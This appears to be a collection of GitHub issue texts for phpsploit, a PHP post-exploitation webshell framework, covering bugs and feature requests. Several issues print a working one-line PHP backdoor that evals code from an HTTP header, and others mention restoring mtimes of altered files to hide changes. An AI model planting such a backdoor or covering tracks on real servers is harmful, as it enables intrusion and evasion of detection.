Description:

If we add some invalid php strings to REQ_HEADER_PAYLOAD setting through
set REQ_HEADER_PAYLOAD + invalid_str, the value is added to RandLineBuffer
without being checked. So while commencet to a TARGET, there will be 50% of chances
that the REQ_HEADER_PAYLOAD expands to 'invalid_str', failing to run remote command.

Steps to reproduce:

./test/test-connected.sh

phpsploit(127.0.0.1)  > set REQ_HEADER_PAYLOAD + invalid_str
phpsploit(127.0.0.1) > ls

Listing: /tmp/17b53cbc-39fa-4b69-b76a-b5be5341cdad
==================================================

Mode  Size  Last Modified                   Name     
----  ----  -------------                   ----     
dr--  80    Tue Oct 21 20:47:29 +0000 2014  .
drwt  740   Tue Oct 21 20:47:32 +0000 2014  ..
-rw-  45    Tue Oct 21 20:47:28 +0000 2014  index.php
-rw-  208   Tue Oct 21 20:47:39 +0000 2014  php.log  

phpsploit(127.0.0.1)  > ls
[-] ls: Python runtime error (exception occured):
[!] Type Error: not all arguments converted during string formatting
phpsploit(127.0.0.1) >

parent directory of altered files needs to have mtime restored too

The behavior of alias command lacks verbosity when assigning the special 'none' value (which deletes the alias.

A message should explicitly say that alias has just been deleted.

Are you sure chnages in data/config/config is sourced and applied after running phpsploit

I changed and uncommented the PASSKEY and but I don't see any change in set command output

This is on macOS - Python3

Configuration

• Default browser: Firefox 43.0.4
• Linux Kernel: 4.3.3
• Python version: Python 3.5.1

Issue description:

If i run phpinfo --browse when my browser is already open, i get the following firefox error message:

Firefox is already running, but is not responding. To open a new window, you must first close the existing Firefox process, or restart your system.

@yurilaaziz , you are wlecome to handle this, as you implemented --browse option :)

We might investivate to see if the browser opening library in python can't handle this.

I would be cool if dynamically created HTTP_* settings could be unset.

When phpsploit is launched with a session file whose remote environment has changed (for example in cases where target is now hosted in a diferent platform than in the past), the user's choice is asked, in order to know if the environment variables should be upgraded.

Therefore, most of the time, used might want to get a visual diff between old and new environment.

The framework v1 (2012) is very old and completely different than the current verions whish has been fully rewritten, therefore, making the new framework compatible with legacy phpsploit sessions may be interesting...
TODO

The lrun command should be able to change $PWD of user OS juste like the run plugin does.

This enhancement also allows removal of the lcd and lpwd core commands, in order to keep the framework interface user friendly (or less creepy ^^).

Description

The plugin should have a nice docstring help, and act similarly than
the unix stat command.

• It should handle the -L option (to get info about a symlink instead of its target).
• Assuming that real stat output is ugly, we can consider doing better here.

NOTE:

While fully tested and considered as basically stable, please consider removing the old fileinfo plugin for the pull request.

due to a strange implementation of http.client.HTTPSConnection, i didn't found a clean way
to intercept raw requests by overrinding send() method as i did for HTTPConnection.

This issue applies since commit c52634a

The following command:
lrun sleep 3 &
fails, because the & token is interpreted by phpsploit command parser.

So, intuitive workaround consists in running the command like this:
lrun "sleep 3 &"

Therefore it fails:

phpsploit> lrun "sleep 3 &"
[!] File Not Found Error: No such file or directory: 'sleep 3 &'

Hello, how can i solve this problem?

Traceback (most recent call last):
File "D:\phpsploit\phpsploit", line 22, in
import core
File "D:\phpsploit\src\core__init__.py", line 16, in
from .config import userdir
File "D:\phpsploit\src\core\config.py", line 13, in
from datatypes import Path
File "D:\phpsploit\src\datatypes__init__.py", line 47, in
from .ByteSize import ByteSize
File "D:\phpsploit\src\datatypes\ByteSize.py", line 1, in
from ui.color import colorize
File "D:\phpsploit\src\ui__init__.py", line 68, in
from . import input
File "D:\phpsploit\src\ui\input__init__.py", line 17, in
from .expect import Expect
File "D:\phpsploit\src\ui\input\expect.py", line 6, in
from ..output import isatty
File "D:\phpsploit\src\ui\output__init__.py", line 40, in
isatty = sys.stdout.isatty
AttributeError: 'NoneType' object has no attribute 'isatty'

Steps to reproduce:

$ phpsploit -c /dev/null -e 'exploit --get-backdoor' ; echo $?

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
1

Description

We should support the shell convention of proxy settings based on the env vars of shell in order to set a default value for the $PROXY setting at start of the franework.

Common variables seems to be:

http_proxy
https_proxy
no_proxy

Therefore, it is possible that i forgotten some of them.

Notes:

• We might ignore the no_proxy variable, which highly complicates imple;entation of this enhancement.
• As for any issue, i am open to discussion about possible mistakes or implementation related discussions.

It make impossible using a passkey with underscore, because header value with '_' separator instead of '-' are ignored by PHP in this configuration.

description:

autocompletion while pressing does not works when two command strings diverge
after a '-' char.

steps to reproduce:

$ phpsploit

alias command-1 foo
alias command-2 bar
(now type command and press )

Description:
When help set has been written in the CLI, the autocompletion continues giving phpsploit commands as third argument instead of settings list.

Steps to reproduce:

phpsploit(127.0.0.1) > help set <TAB><TAB>
alias      bind       chmod      cp         env        fileinfo   infect     load       ls         mysql      portscan   rmdir      save       source     target     whoami     
backdoor   cat        clear      download   exit       help       lcd        lpwd       mkdir      oracle     pwd        rtfm       session    stat       touch      
backlog    cd         corectl    edit       exploit    history    ldap       lrun       mssql      phpinfo    rm         run        set        suidroot   upload     
phpsploit(127.0.0.1) > help set

il would ease new implementation of oracle plugin (ORACLE_CREDS)
and also of a new phpexec plugin, using a multiline env var as php source code

Hi,
Is it possible to define some post parameters for a target?
We can only define as POST HTTP method, but without any extra parameters.

ex:
POST http://target.com/
DATA: action=vulnerable

Plugins using execute.php (run & suidroot) should display a verbose error message if execute() failed to do RCE due to TARGET limitations.

Seems that phpsploit ask the server not to compress data it sends, by sending by default the header Accept-Encoding: identity (synonym for "no encoding")

Saw it with corectl display-http-requests

Issue

Assuming that the datatypes.Path() object have an edit() method which reads the $EDITOR setting (aka session.Conf.EDITOR), it could be interesting to force this method to only return False if ui.isatty() is False.
Otherwise, someone using a curses-based editor such as vim will encounter some problems while trying to automate some phpsploit process that calls datatypes.Path().edit() even once.
Example:

phpsploit -e "set TARGET +" > /tmp/phpsploit.result

_This fails because the _set TARGET +* command tries to open the EDITOR variable's contents through the users's prefered text editor. Therefore, stdout is not a tty, so vim hangs up...*

Indeed, users of graphical editors will not suffer any problem (except that they are asked to edit something while trying to automate a phpsploit script).

Conclusion

I am still not fixed about the proper way to handle this, should we change current behavior by checking if stdin/stdout are TTYs in the edit() method, or not ???
Feel free to give your opinions!

I was thinking that it would be interesting if the script had a databse and when we register targets it store them in it. Then we can list the targets with an ID and then select a target by ID. We could also be able to send a command to all the targets.

I wonder why this directory exist.

For example, i need to use yaml format and i can't find an easy way.
Indeed, PyYaml need multiple dependencies and it's annoying to download and include each of them.
Why don't use requirement.txt ?
Or virtualenv ?

Task

The phpinfo currently provides a tty formated output for taget's phpinfo().
Therefore, assuming that we have a $BROWSER setting, we can easily
add a --browser option, which retrieves the html output of remote phpinfo(),
then displays it in the user's browser.

Tips

In order to easily write an html buffer to a file, then open it with browser
you can use the Path() datatype, which provides temporary file creation
and a browse() method for browser display.

Implementation:

from datatypes import Path
file = Path(filename="phpinfo.html")
file.write(html_string_buffer)
file.browse()
del file

I've tried to add autocompletion mechanism to some file related plugins (the idea - after running "ls", the "cat" plugin, or any other plugin, will have autocompletion for the remote files and dirs):

\phpsploit\src\ui\interface.py:

    def complete_cat(self, text, *_):
        return [x for x in session.TargetFiles if x.startswith(text)]

\phpsploit\src\core\session__init__.py:

        self.File = None
        self.TargetFiles = []

    def _isattr(self, name):

\phpsploit\plugins\file_system\ls\plugin.py:

    rows = sorted(rows, key=(lambda elem: elem[-1]))

    for file in rows:
        file = file[3]
        if file != "." and file != "..":
            session.TargetFiles.append(target + file)

    rows.insert(0, rows_hdr)

When I'm testing it, it's never working as it supposed to work, and behaving very strange:

phpsploit(localhost) > cat D:\\
D:\xampp\FileZillaFTP           D:\xampp\contrib                D:\xampp\mailtodisk             D:\xampp\readme_de.txt          D:\xampp\webdav
D:\xampp\MercuryMail            D:\xampp\ctlscript.bat          D:\xampp\mercury_start.bat      D:\xampp\readme_en.txt          D:\xampp\xampp-control.exe
D:\xampp\anonymous              D:\xampp\filezilla_setup.bat    D:\xampp\mercury_stop.bat       D:\xampp\security               D:\xampp\xampp-control.ini
D:\xampp\apache                 D:\xampp\filezilla_start.bat    D:\xampp\mysql                  D:\xampp\service.exe            D:\xampp\xampp-control.log
D:\xampp\apache_start.bat       D:\xampp\filezilla_stop.bat     D:\xampp\mysql_start.bat        D:\xampp\setup_xampp.bat        D:\xampp\xampp_shell.bat
D:\xampp\apache_stop.bat        D:\xampp\htdocs                 D:\xampp\mysql_stop.bat         D:\xampp\src                    D:\xampp\xampp_start.exe
D:\xampp\catalina_service.bat   D:\xampp\img                    D:\xampp\passwords.txt          D:\xampp\test_php.bat           D:\xampp\xampp_stop.exe
D:\xampp\catalina_start.bat     D:\xampp\install                D:\xampp\perl                   D:\xampp\tmp
D:\xampp\catalina_stop.bat      D:\xampp\licenses               D:\xampp\php                    D:\xampp\tomcat
D:\xampp\cgi-bin                D:\xampp\locale                 D:\xampp\phpMyAdmin             D:\xampp\uninstall.dat
D:\xampp\changes.txt            D:\xampp\mailoutput             D:\xampp\properties.ini         D:\xampp\uninstall.exe
phpsploit(localhost) > cat D:\\D:\Temp\[!] Runtime Error: can't re-enter readline
Readline internal error
Traceback (most recent call last):
  File "C:\Python3\lib\site-packages\pyreadline\console\console.py", line 768, in hook_wrapper_23
    res = ensure_str(readline_hook(prompt))
  File "C:\Python3\lib\site-packages\pyreadline\rlmain.py", line 571, in readline
    self._readline_from_keyboard()
  File "C:\Python3\lib\site-packages\pyreadline\rlmain.py", line 536, in _readline_from_keyboard
    if self._readline_from_keyboard_poll():
  File "C:\Python3\lib\site-packages\pyreadline\rlmain.py", line 556, in _readline_from_keyboard_poll
    result = self.mode.process_keyevent(event.keyinfo)
  File "C:\Python3\lib\site-packages\pyreadline\modes\emacs.py", line 243, in process_keyevent
    r = self.process_keyevent_queue[-1](keyinfo)
  File "C:\Python3\lib\site-packages\pyreadline\modes\emacs.py", line 286, in _process_keyevent
    r = dispatch_func(keyinfo)
  File "C:\Python3\lib\site-packages\pyreadline\modes\basemode.py", line 257, in complete
    completions = self._get_completions()
  File "C:\Python3\lib\site-packages\pyreadline\modes\basemode.py", line 200, in _get_completions
    r = self.completer(ensure_unicode(text), i)
  File "D:\phpspolit\deps\shnake-0.4\shnake\shell.py", line 402, in complete
    compfunc = getattr(self, 'complete_'+name)
TypeError: Can't convert 'NoneType' object to str implicitly

Issue:

The ls plugin leaves at the first invalid given argument path.
In order to act like the unix's ls command, it will will be nice if the plugin displays
an error for each invalid path, but continue processing the following paths.

Steps to reproduce:

phpsploit(127.0.0.01) >  ls /home /invalid/path /home

Listing: /home
==============

Mode  Size  Last Modified                   Name
----  ----  -------------                   ----
dr-x  4K    Thu Dec 27 08:18:47 +0000 2012  .
d---  0     Thu Jan 01 00:00:00 +0000 1970  ..
dr--  4K    Sun Jul 20 06:37:03 +0000 2014  nil

[-] ls: cannot access /invalid/path: No such file or directory.

DESCRIPTION:
the session diff command becomes very slow when called multiple times.

STEPS TO REPRODUCE

$ phpsploit
phpsploit > session diff; session diff; session diff

if two or more phpsploit instances are run with the same session file,
the framework should advise user before overriding the session with session save,
on case where the session file has been already saved from another instance.

this could be done by saving an md5sum of last known session state, then comparing
it to current state just before saving.

The MetaDict object is awesome and used in some parts of the phpsploit core.
Therefore, i found a design misstake in it's setitem() behavior.
Indeed, setting an item with a None, "None" or "" value removes the item instead of
setting it to the wanted value.
This is useful for aliases and environment variables but the **api.payload.Payload() object also unherits MetaDict, and having an item automatically deleted while setting its value to an empty string i clearly unexpected...

Must fix it quickly...

Current behavior of corectl python-console uses the first available interpreter in this order of preference: bpython, IPython, then built-in interpreter.

An user could have both bpython and IPython installed and still prefer to use IPython.
But from now the only way to use IPython in corectl python-console is to uninstall bpython from system.

Description:

It may be an good idea to implement some workaround designed to change the php's error_reporting level.
For the moment, it is hardcoded in the payload main encapsulator
(at data/tunnel/encapsulator.php file).

For framework maintenance and plugin development purposes, i think it's interesting to have a way to reconfigure this value dinamically.

How to implement it:

I am still hesitant about the proper way to implement it.
A boolean approach consists in setting default value to something like:
E_ERROR | E_PARSE
An the 'verbose' value to something like
E_ALL

This way we can make it depend of the $VERBOSITY setting, wich already exists, it is a way that privilegiate a minimalistic framework, without having too much settings.
Another aproach, is to create en new setting called $PHP_ERROR_REPORTING (Boolean() type).

Instead of the boolean approach, we can make a $PHP_ERROR_REPORTING setting of type PhpCode(), or, for an extended customisation, we can have a $PAYLOAD_PREFIX variable, which allows user to add anything he wants as payload prefix.

Also, we can convert the $VERBOSITY variable from Boolean() paragygm to a variable of type int, designed to be set with bitwise operations.

Conclusion:

As you can see, i have no idea for the moment on the proper way to implement this great enhancement, so please, feel free to give your opinion ! :)

Currently, decorators are organised this way:

src/decorators/
├── __init__.py
├── isolate_io_context.py
└── readonly_settings.py

I love this way, so decorators can be used in the following manners:

import decorators
@decorators.isolate_io_context
def foo():
    pass

or

from decorators import isolate_io_context
@isolate_io_context
def foo():
    pass

Therefore, i got a cyclic dependency tree, while trying to use a decorator at an initialization layer,
because the other decorator was loaded too while importing decorators.

For the moment, i did a local copy of isolate_io_context on src/ui/input/expect.py, which is they
file where i found that issue.

Is there a way to use decorators import in a clean way, without loading all of them when just importing decorators ?
I'd like a way where a file is really loaded only when callding it (e.g: import decorator.isolate_io_context).

I think something like this:

import decorators.iolate_io_context
@decorators.isolate_io_context.isolate_io_context
def foo():
    pass

is ugly...

I m open to any suggestion..

after executing ./phpsploit it shows this error

Plugin loader: 2 error(s) found (use corectl reload-plugins for more infos)

] Couldn't compile plugin: « /opt/phpsploit/plugins/file_system/fileinfo »

[#] Traceback (most recent call last):
[#] File "/opt/phpsploit/src/core/plugins/Plugin.py", line 56, in init
[#] code = compile(script, "", "exec")
[#] File "", line 69
[#] print ''
[#] ^
[#] SyntaxError: Missing parentheses in call to 'print'
[#]
[#] Couldn't compile plugin: « /opt/phpsploit/plugins/file_system/search »
[#] Traceback (most recent call last):
[#] File "/opt/phpsploit/src/core/plugins/Plugin.py", line 56, in init
[#] code = compile(script, "", "exec")
[#] File "", line 56
[#] print ''
[#] ^
[#] SyntaxError: Missing parentheses in call to 'print'

If we run env in phpsploit out of exploited context, it returns an obscure error message:

$ ./phpsploit -e env

[!] Value Error: No such Environment Variables

When navigating a remote system it is useful to be aware of symlinks and paths. Otherwise sometimes you get stuck moving around in circles without noticing for a while.

Maybe the ls plugin could show these (like ls -l).

Phpsploit's command line prompt works with the shnake library, which itself uses readline.
It works nice, except when changing terminal size; After that, the readline multine buffer handler looks completely broken.

"root@kali:~/phpsploit# python3 phpsploit
Traceback (most recent call last):
File "/root/phpsploit/deps/init.py", line 29, in
import(module)
ImportError: No module named shutil_update

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/root/phpsploit/deps/init.py", line 36, in
imp.load_package(module, abspath)
File "/root/phpsploit/deps/./shutil_update/init.py", line 14, in
needs('which', 'get_terminal_size')
File "/root/phpsploit/deps/./shutil_update/init.py", line 10, in needs
module = getattr(import('shutil_new'), attr)
ImportError: No module named shutil_new

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "phpsploit", line 16, in
import src # spread phpsploit sources
File "/root/phpsploit/src/init.py", line 15, in
import deps
File "/root/phpsploit/deps/init.py", line 38, in
except (ImportError, FileNotFoundError):
NameError: name 'FileNotFoundError' is not defined"

I seem to have that error message when running it, this may be my own fault but anyways...
Any suggestions?

As phpsploit conding convention allows now use of any php function from versions <= 4.3.0, glob() is now available, and should be used on ls plugin instead of archaic matchRegexp()

i keep getting error when i tried using UPLOAD syntax

-] HTTP Error 400: Bad Request
[-] upload: Python runtime error (exception occured):
[!] Request Error: Communication with the server impossible

Before wrapping PhpCode() and ShellCmd() datatypes with generic Code() datatype, the command above was working correctly:

phpsploit -e "set BACKDOOR '<?php @eval($_SERVER['HTTP_%%PASSKEY%%']); ?>'; set BACKDOOR"

Now, it encapsulates the given strings with php tags even if the provided string already had php tags included.

The right behavior is to remove php tags in the provided string, then return a representation by adding new-style php tags (aka ''). That way, all of the following commands shall return exactly the same value representation.

phpsploit -e "set BACKDOOR '@eval($_SERVER['HTTP_%%PASSKEY%%']);'; set BACKDOOR"
phpsploit -e "set BACKDOOR '<? @eval($_SERVER['HTTP_%%PASSKEY%%']); ?>'; set BACKDOOR"
phpsploit -e "set BACKDOOR '<?php @eval($_SERVER['HTTP_%%PASSKEY%%']);; ?>'; set BACKDOOR"

All of them shall return:

Configuration Settings
======================

    Variable  Value
    --------  -----
    BACKDOOR  <?php @eval([HTTP_%%PASSKEY%%]); ?>

git blame:

I don't know why, but I can't seem to be able to use phpsploit.
Everytime i use "exploit", I get the error "Key Error: ADDR".
If I replace the payload with $_GET['cmd'], everything works fine manually (like ls).

The clear core command is an old command from the good old times, when phpsploit supported windows.
Now, it is noisy, and could (should?) be replaced by a simple alias (alias clear "lrun clear").

The warning message 'server response could not be unparsed' may be thrown because PASSKEY is not set properly.
Indeed, more verbosity must be added after this message, indicating that the warning may happen because PASSKEY may be not set according to remote backdoor's PASSKEY.

The session command displays session components in a non deterministic order, making session diff potentially dirty.

Sometimes, Command aliases component is displayed after, and sometimes before Configuration Settings component.

This must be fixed.

Why so many commands that cannot be executed? Like 'git' for example. I cant use git in phpsploit, but I can used it with WebConsole. Why? Is phpsploit used to be like back-connect?

this is phpsploit

this is webconsole

When opening a phpsploit session, and running exploit, the command updates env vars even on cases where it is stupid.
E.G: When the previous PWD has been set to a pecific value, exploit updates it to the current value taken from core/tunnel/connector.py, instead of leaving it as it was.

A smart way to handle this specific case would be to test remotely if session stored $PWD is still OK with a chdir(), then update it only if it is outdated.

Steps to reproduce:

• run phpsploit
• run commands to have a basic history
• run corectl python-console (without bpython/ipython)
• press UP arrow key, history is not reset

Notes:

isolate_readline_context & isolate_io_context decorators should backup a copy of the history, flush it, run the decorated function, and finally flush temp history and restore the previous one.